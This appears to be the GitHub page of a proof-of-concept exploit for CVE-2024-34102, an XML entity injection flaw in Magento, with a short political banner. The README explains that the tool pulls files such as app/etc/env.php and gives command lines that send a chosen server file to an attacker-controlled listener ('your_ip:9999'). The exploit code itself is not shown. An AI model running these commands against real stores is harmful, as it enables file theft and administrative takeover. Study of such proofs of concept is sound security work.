Skip to content

A PoC demonstration , critical XML entity injection vulnerability in Magento

Notifications You must be signed in to change notification settings

d0rb/CVE-2024-34102

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

We demand the safe return of all citizens who have been taken hostage by the terrorist group Hamas. We will not rest until every hostage is released and returns home safely. You can help bring them back home. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

This repository contains a proof-of-concept (PoC) exploit for the critical XML entity injection vulnerability (CVE-2024-34102) in Magento. This vulnerability allows for the exfiltration of sensitive files, which can then be leveraged to gain unauthorized access to Magento's administrative functionalities. This exploit is designed for educational purposes and should be used responsibly.

Overview 📖

Magento is one of the most popular e-commerce solutions used globally. In June 2024, a critical pre-authentication XML entity injection issue was discovered, identified as CVE-2024-34102. This vulnerability can lead to severe consequences, including the exfiltration of the app/etc/env.php file from Magento, which contains cryptographic keys used for signing JWTs.

Features 🌟

  • Exfiltrate sensitive files from a vulnerable Magento instance.
  • Simple and straightforward usage.
  • Educational demonstration of XML entity injection.

Usage 🚀

Prerequisites

  • Python 3.x
  • requests library (pip install requests)

Running the Exploit

  1. Clone the repository:

    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
  2. Execute the script with the necessary arguments:

    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999

Command-Line Arguments

  • --target-url: The URL of the target Magento instance.
  • --target-file: The file path on the target server to exfiltrate.
  • --exfil-url: The URL to receive the exfiltrated data.

Example 🌐

python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999

About

A PoC demonstration , critical XML entity injection vulnerability in Magento

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages